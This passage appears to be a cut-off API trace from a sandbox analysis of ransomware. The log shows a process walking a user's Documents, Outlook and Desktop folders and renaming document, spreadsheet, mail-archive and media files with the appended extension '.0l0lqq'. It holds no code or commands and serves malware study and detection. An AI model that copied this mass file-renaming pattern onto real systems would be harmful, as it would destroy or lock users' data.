"c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\vedu1mkjbjzcfl1zr490\\bfpptg8v.csv.0l0lqq")) returned 1 [0255.717] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\ozutj.doc", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\ozutj.doc", lpFilePart=0x0) returned 0x68 [0255.723] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\ozutj.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\vedu1mkjbjzcfl1zr490\\ozutj.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\ozutj.doc.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\vedu1mkjbjzcfl1zr490\\ozutj.doc.0l0lqq")) returned 1 [0255.725] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\MFw4s0sXs5Hzn02y\\0Q3V8eEWHEPwaqI.csv", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\MFw4s0sXs5Hzn02y\\0Q3V8eEWHEPwaqI.csv", lpFilePart=0x0) returned 0x83 [0255.729] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\MFw4s0sXs5Hzn02y\\0Q3V8eEWHEPwaqI.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\vedu1mkjbjzcfl1zr490\\mfw4s0sxs5hzn02y\\0q3v8eewhepwaqi.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\MFw4s0sXs5Hzn02y\\0Q3V8eEWHEPwaqI.csv.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\vedu1mkjbjzcfl1zr490\\mfw4s0sxs5hzn02y\\0q3v8eewhepwaqi.csv.0l0lqq")) returned 1 [0255.730] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\MFw4s0sXs5Hzn02y\\3iG3HJcSqUYFp.doc", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\MFw4s0sXs5Hzn02y\\3iG3HJcSqUYFp.doc", lpFilePart=0x0) returned 0x81 [0255.733] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\MFw4s0sXs5Hzn02y\\3iG3HJcSqUYFp.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\vedu1mkjbjzcfl1zr490\\mfw4s0sxs5hzn02y\\3ig3hjcsquyfp.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\MFw4s0sXs5Hzn02y\\3iG3HJcSqUYFp.doc.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\vedu1mkjbjzcfl1zr490\\mfw4s0sxs5hzn02y\\3ig3hjcsquyfp.doc.0l0lqq")) returned 1 [0255.735] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\MFw4s0sXs5Hzn02y\\fq2jS8Z.xlsx", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\MFw4s0sXs5Hzn02y\\fq2jS8Z.xlsx", lpFilePart=0x0) returned 0x7c [0255.739] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\MFw4s0sXs5Hzn02y\\fq2jS8Z.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\vedu1mkjbjzcfl1zr490\\mfw4s0sxs5hzn02y\\fq2js8z.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\MFw4s0sXs5Hzn02y\\fq2jS8Z.xlsx.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\vedu1mkjbjzcfl1zr490\\mfw4s0sxs5hzn02y\\fq2js8z.xlsx.0l0lqq")) returned 1 [0255.741] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\MFw4s0sXs5Hzn02y\\yBRrG-DboNNJQI5pORhz.csv", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\MFw4s0sXs5Hzn02y\\yBRrG-DboNNJQI5pORhz.csv", lpFilePart=0x0) returned 0x88 [0255.747] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\MFw4s0sXs5Hzn02y\\yBRrG-DboNNJQI5pORhz.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\vedu1mkjbjzcfl1zr490\\mfw4s0sxs5hzn02y\\ybrrg-dbonnjqi5porhz.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\MFw4s0sXs5Hzn02y\\yBRrG-DboNNJQI5pORhz.csv.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\vedu1mkjbjzcfl1zr490\\mfw4s0sxs5hzn02y\\ybrrg-dbonnjqi5porhz.csv.0l0lqq")) returned 1 [0255.750] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\MFw4s0sXs5Hzn02y\\C1mBhPigcSc0Hp6f61u4\\A44ZqS2UAG.csv", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\MFw4s0sXs5Hzn02y\\C1mBhPigcSc0Hp6f61u4\\A44ZqS2UAG.csv", lpFilePart=0x0) returned 0x93 [0255.756] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\MFw4s0sXs5Hzn02y\\C1mBhPigcSc0Hp6f61u4\\A44ZqS2UAG.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\vedu1mkjbjzcfl1zr490\\mfw4s0sxs5hzn02y\\c1mbhpigcsc0hp6f61u4\\a44zqs2uag.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\MFw4s0sXs5Hzn02y\\C1mBhPigcSc0Hp6f61u4\\A44ZqS2UAG.csv.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\vedu1mkjbjzcfl1zr490\\mfw4s0sxs5hzn02y\\c1mbhpigcsc0hp6f61u4\\a44zqs2uag.csv.0l0lqq")) returned 1 [0255.786] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\MFw4s0sXs5Hzn02y\\C1mBhPigcSc0Hp6f61u4\\vkB-A8sCJ8sR.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\vedu1mkjbjzcfl1zr490\\mfw4s0sxs5hzn02y\\c1mbhpigcsc0hp6f61u4\\vkb-a8scj8sr.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\MFw4s0sXs5Hzn02y\\C1mBhPigcSc0Hp6f61u4\\vkB-A8sCJ8sR.odt.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\vedu1mkjbjzcfl1zr490\\mfw4s0sxs5hzn02y\\c1mbhpigcsc0hp6f61u4\\vkb-a8scj8sr.odt.0l0lqq")) returned 1 [0255.793] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\MFw4s0sXs5Hzn02y\\C1mBhPigcSc0Hp6f61u4\\_wsi.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\vedu1mkjbjzcfl1zr490\\mfw4s0sxs5hzn02y\\c1mbhpigcsc0hp6f61u4\\_wsi.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\MFw4s0sXs5Hzn02y\\C1mBhPigcSc0Hp6f61u4\\_wsi.doc.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\vedu1mkjbjzcfl1zr490\\mfw4s0sxs5hzn02y\\c1mbhpigcsc0hp6f61u4\\_wsi.doc.0l0lqq")) returned 1 [0255.798] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\MFw4s0sXs5Hzn02y\\-LddaJW7Xuq56QFH\\OO6bINfj.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\vedu1mkjbjzcfl1zr490\\mfw4s0sxs5hzn02y\\-lddajw7xuq56qfh\\oo6binfj.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\veDu1mKJbJZcFL1zr490\\MFw4s0sXs5Hzn02y\\-LddaJW7Xuq56QFH\\OO6bINfj.xlsx.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\vedu1mkjbjzcfl1zr490\\mfw4s0sxs5hzn02y\\-lddajw7xuq56qfh\\oo6binfj.xlsx.0l0lqq")) returned 1 [0255.801] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\GD7n3HjCbwlytkbH1mf.doc", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\GD7n3HjCbwlytkbH1mf.doc", lpFilePart=0x0) returned 0x6c [0255.810] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\GD7n3HjCbwlytkbH1mf.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\rrbvkffygj\\gd7n3hjcbwlytkbh1mf.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\GD7n3HjCbwlytkbH1mf.doc.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\rrbvkffygj\\gd7n3hjcbwlytkbh1mf.doc.0l0lqq")) returned 1 [0255.822] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\Ijpb35QVWHR.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\rrbvkffygj\\ijpb35qvwhr.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\Ijpb35QVWHR.pptx.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\rrbvkffygj\\ijpb35qvwhr.pptx.0l0lqq")) returned 1 [0255.825] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\Itvy.rtf", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\Itvy.rtf", lpFilePart=0x0) returned 0x5d [0255.832] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\Itvy.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\rrbvkffygj\\itvy.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\Itvy.rtf.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\rrbvkffygj\\itvy.rtf.0l0lqq")) returned 1 [0255.842] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\oVPM4n rQuyC_aGyMA.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\rrbvkffygj\\ovpm4n rquyc_agyma.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\oVPM4n rQuyC_aGyMA.ppt.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\rrbvkffygj\\ovpm4n rquyc_agyma.ppt.0l0lqq")) returned 1 [0255.845] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\V9VGonngTSk4XXlhC\\8o0vWSy7A4x7F.pdf", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\V9VGonngTSk4XXlhC\\8o0vWSy7A4x7F.pdf", lpFilePart=0x0) returned 0x78 [0255.848] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\V9VGonngTSk4XXlhC\\8o0vWSy7A4x7F.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\rrbvkffygj\\v9vgonngtsk4xxlhc\\8o0vwsy7a4x7f.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\V9VGonngTSk4XXlhC\\8o0vWSy7A4x7F.pdf.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\rrbvkffygj\\v9vgonngtsk4xxlhc\\8o0vwsy7a4x7f.pdf.0l0lqq")) returned 1 [0255.855] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\V9VGonngTSk4XXlhC\\AaVVRoXDZ.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\rrbvkffygj\\v9vgonngtsk4xxlhc\\aavvroxdz.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\V9VGonngTSk4XXlhC\\AaVVRoXDZ.doc.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\rrbvkffygj\\v9vgonngtsk4xxlhc\\aavvroxdz.doc.0l0lqq")) returned 1 [0255.856] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\V9VGonngTSk4XXlhC\\kW8oI CAYYf.ppt", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\V9VGonngTSk4XXlhC\\kW8oI CAYYf.ppt", lpFilePart=0x0) returned 0x76 [0255.862] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\V9VGonngTSk4XXlhC\\kW8oI CAYYf.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\rrbvkffygj\\v9vgonngtsk4xxlhc\\kw8oi cayyf.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\V9VGonngTSk4XXlhC\\kW8oI CAYYf.ppt.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\rrbvkffygj\\v9vgonngtsk4xxlhc\\kw8oi cayyf.ppt.0l0lqq")) returned 1 [0255.864] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\V9VGonngTSk4XXlhC\\D6eUSEXzf\\ft8_ R.xlsx", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\V9VGonngTSk4XXlhC\\D6eUSEXzf\\ft8_ R.xlsx", lpFilePart=0x0) returned 0x7c [0255.867] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\V9VGonngTSk4XXlhC\\D6eUSEXzf\\ft8_ R.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\rrbvkffygj\\v9vgonngtsk4xxlhc\\d6eusexzf\\ft8_ r.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\V9VGonngTSk4XXlhC\\D6eUSEXzf\\ft8_ R.xlsx.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\rrbvkffygj\\v9vgonngtsk4xxlhc\\d6eusexzf\\ft8_ r.xlsx.0l0lqq")) returned 1 [0255.878] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\V9VGonngTSk4XXlhC\\D6eUSEXzf\\IUg6zVOscfvmPX1ZrpW.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\rrbvkffygj\\v9vgonngtsk4xxlhc\\d6eusexzf\\iug6zvoscfvmpx1zrpw.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\V9VGonngTSk4XXlhC\\D6eUSEXzf\\IUg6zVOscfvmPX1ZrpW.ppt.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\rrbvkffygj\\v9vgonngtsk4xxlhc\\d6eusexzf\\iug6zvoscfvmpx1zrpw.ppt.0l0lqq")) returned 1 [0255.880] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\V9VGonngTSk4XXlhC\\D6eUSEXzf\\jsJglGv5Mw.pdf", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\V9VGonngTSk4XXlhC\\D6eUSEXzf\\jsJglGv5Mw.pdf", lpFilePart=0x0) returned 0x7f [0255.884] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\V9VGonngTSk4XXlhC\\D6eUSEXzf\\jsJglGv5Mw.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\rrbvkffygj\\v9vgonngtsk4xxlhc\\d6eusexzf\\jsjglgv5mw.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\V9VGonngTSk4XXlhC\\D6eUSEXzf\\jsJglGv5Mw.pdf.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\rrbvkffygj\\v9vgonngtsk4xxlhc\\d6eusexzf\\jsjglgv5mw.pdf.0l0lqq")) returned 1 [0255.886] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\gM430JbVOCTT\\H30L29eW.ods", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\gM430JbVOCTT\\H30L29eW.ods", lpFilePart=0x0) returned 0x6e [0255.891] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\gM430JbVOCTT\\H30L29eW.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\rrbvkffygj\\gm430jbvoctt\\h30l29ew.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TbcTIVyGuBBLe7\\1 MmEbxkGqY3oG2SgD\\RrBVkffygJ\\gM430JbVOCTT\\H30L29eW.ods.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbctivygubble7\\1 mmebxkgqy3og2sgd\\rrbvkffygj\\gm430jbvoctt\\h30l29ew.ods.0l0lqq")) returned 1 [0255.916] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.0l0lqq")) returned 1 [0255.933] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0Qlo53IJ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0qlo53ij.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0Qlo53IJ.mp3.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0qlo53ij.mp3.0l0lqq")) returned 1 [0255.935] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4zEr683YnE_zNHNSW.ppt", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS 